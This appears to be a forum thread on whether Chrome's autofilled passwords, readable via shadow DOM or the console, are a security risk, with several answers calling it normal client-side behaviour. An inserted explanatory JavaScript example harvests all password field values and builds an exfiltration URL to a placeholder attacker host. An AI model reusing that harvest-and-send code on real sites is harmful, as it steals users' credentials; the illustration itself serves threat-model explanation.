Reputation: 4261
SCENARIO 1
I have saved my username and password in Chrome. So when I enter my username, the password automatically gets filled. Now, it's obvious that if someone else knows my app username, he can log in, as the password is autofilled. But he should not know the password.
But I observed that enabling "Show user agent shadow DOM" in Chrome settings reveals my password. (See image.)
SCENARIO 2
Also, I found as part of a different scenario that if I use the following code, then the password is revealed:
<input type="password" name="user[password]" id="user_password">
console.log(user_password.value) // Gives away the password in console
How far is this correct and secure? And what can be done to prevent this?
Upvotes: 0
Views: 118
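To make Scenario 2 concrete, here is an added example that is not part of the question or any of the answers. It generalises `console.log(user_password.value)`: any script running in the page, whether typed into the DevTools console or injected through an XSS bug, executes with the page's origin and can read every autofilled password field and send it wherever it likes. The function takes a document-like object so the same code can be run against the real `document` in a browser and against the constructed stand-in below in Node; the collector hostname is a placeholder, and the form fields and sample password are constructed to mirror the `user_password` / `user[password]` input from the question.

```javascript
// Added example, not code from the question or answers.
// Any script with the page's origin (DevTools console, or an XSS payload) can read
// the value the browser autofilled into a password field and exfiltrate it.

function harvestPasswordFields(root) {
  // The same query a DevTools user would type: every <input type="password">.
  return Array.from(root.querySelectorAll('input[type="password"]')).map((el) => ({
    name: el.getAttribute('name'),
    id: el.id,
    // .value is the live value, including whatever the password manager filled in.
    // The bullets are only a rendering; the DOM holds the plaintext.
    value: el.value,
  }));
}

// What an injected script would do next: serialise the harvested values into a
// request to an attacker-controlled host. The hostname is a placeholder (assumption).
function buildExfilUrl(fields, collector = 'https://attacker.example/collect') {
  const params = new URLSearchParams();
  for (const f of fields) params.append(f.name || f.id || 'password', f.value);
  return `${collector}?${params.toString()}`;
}

// Constructed stand-in for the DOM so the example runs offline in Node.
// It models the login form from the question: id="user_password", name="user[password]".
function makeFakeDocument(autofilledPassword) {
  const fields = [
    { tagName: 'INPUT', type: 'text', id: 'user_email', name: 'user[email]', value: 'alice@example.com' },
    { tagName: 'INPUT', type: 'password', id: 'user_password', name: 'user[password]', value: autofilledPassword },
  ].map((attrs) => ({
    ...attrs,
    getAttribute(attrName) { return this[attrName] ?? null; },
  }));
  return {
    querySelectorAll(selector) {
      // Only the selector used by harvestPasswordFields is supported by this stub.
      if (selector !== 'input[type="password"]') throw new Error(`unsupported selector: ${selector}`);
      return fields.filter((f) => f.type === 'password');
    },
  };
}

// Node usage. In a browser, run harvestPasswordFields(document) from the console instead.
if (typeof document === 'undefined') {
  const doc = makeFakeDocument('correct horse battery staple'); // constructed sample value
  const leaked = harvestPasswordFields(doc);
  console.log(leaked);
  console.log(buildExfilUrl(leaked));
}
```

The point for the threat model is that nothing on the page can stop this once a script is running: the defence is keeping untrusted script out (no XSS, a Content Security Policy) and keeping other people away from your unlocked browser profile, not hiding the value from the DOM.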
Reputation: 571
The security you are relying on in this case is the security of your system. If your system is appropriately secured then you can feel comfortable enabling autocomplete in your browser. This will save you time by storing your passwords locally and they could be retrieved in other ways as well given access to your system. If your system is not secure, then you should not be storing your passwords on it. The fact that the browser "knows" the password that was entered and can return it programmatically is not in itself a security issue.
Better to think in terms of how secure rather than the black and white secure vs security issue. I use autocomplete for Stack Overflow and a number of other websites I am a member of. I do not for my banking or credit card sites. I do not for Amazon, because it has my credit card information stored on it. This is where I draw my lines, your mileage may vary.
:-)
Upvotes: 0
Reputation: 1500
At least it's not considered a security issue. A little contradictory, though: web browsers seem to secure themselves against general password revealers, as stated here:
Here's some examples for applications that BulletsPassView cannot reveal their passwords:
- Chrome, Firefox, and Opera Web browsers.
Upvotes: 0
Reputation: 343
First we can take the normal typing case (without autocomplete). After we type our password into the browser window, we can see the original password through inspect element.
Autocomplete works the same way: once the password gets filled into the textbox, we can see the original password through inspect element. This happens normally. It is not a security issue.
And there is no other way to autocomplete the password. It is fully a client-side script job.
Upvotes: 0
Reputation: 217
No, it's not a security issue at all, because this is just what we do with client-side scripting. Actually, the console is showing the password from a web page which is opened in the current tab, and if the password is stored in your browser and anyone tries to reveal the password, your system will prompt for the master password.
And the console isn't responsible for your concern. It always performs client-side scripting on only the currently running web page.
So it's not a security issue.
Upvotes: 1